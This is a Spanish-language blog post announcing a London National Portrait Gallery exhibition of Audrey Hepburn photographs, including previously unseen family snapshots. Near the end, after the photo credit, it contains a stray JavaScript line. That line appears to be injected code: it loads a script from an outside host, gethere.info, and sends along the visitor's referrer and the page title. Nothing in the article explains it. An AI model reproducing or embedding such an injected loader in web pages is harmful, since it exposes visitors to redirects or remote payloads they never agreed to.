El mito Hepburn sigue vivo

11/08/2015

Remixing Audrey, #3

Quien lo diría. Ya han pasado dos décadas desde el fallecimiento de la incomparable y mítica Audrey Hepburn. Sin embargo parece que sigue viva entre nosotros. Su saber estar, su elegancia y su glamour siguen presentes en cualquier manual de estilo que se precie. De hecho, aunque las comparaciones sean odiosas, es francamente maravilloso que alguien te compare con ella.

Y para muestra de que su esencia sigue tan vigente como antaño os traemos una muestra bien apetecible. Hasta el próximo 18 de octubre la National Portrait Gallery de Londres homenajea a la artista con una exposición llena de sorpresas. Gracias a la cesión por parte de sus hijos de algunas instantáneas inéditas podremos ver a la protagonista de My Fair Lady o Desayuno con diamantes en entornos familiares más distendidos y naturales, concociendo incluso como era la actriz de adolescente -sorprende de hecho el poco parecido físico que encontramos entre una fotografía de Hepburn haciendo ballet con 13 años y la Hepburn que años más tarde saltaría a la fama-.

Así que, ya sabes, si quieres recrearte la vista con más de 70 fotografías de una de las estrellas más internacionales de todos los tiempos (decimos esto porque, para quien no lo sepa, Audrey nació en Bélgica, se crió en Holanda, estudió en Inglaterra, desarrolló su carrera de actriz en Hollywood y finalmente falleció en Suiza), no te pierdas este verano esta exposición que vuelve a demostrar una vez más que Hepburn es puro mito y que, de algún modo, sigue entre nosotros.

Foto | Thomas Hawk

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO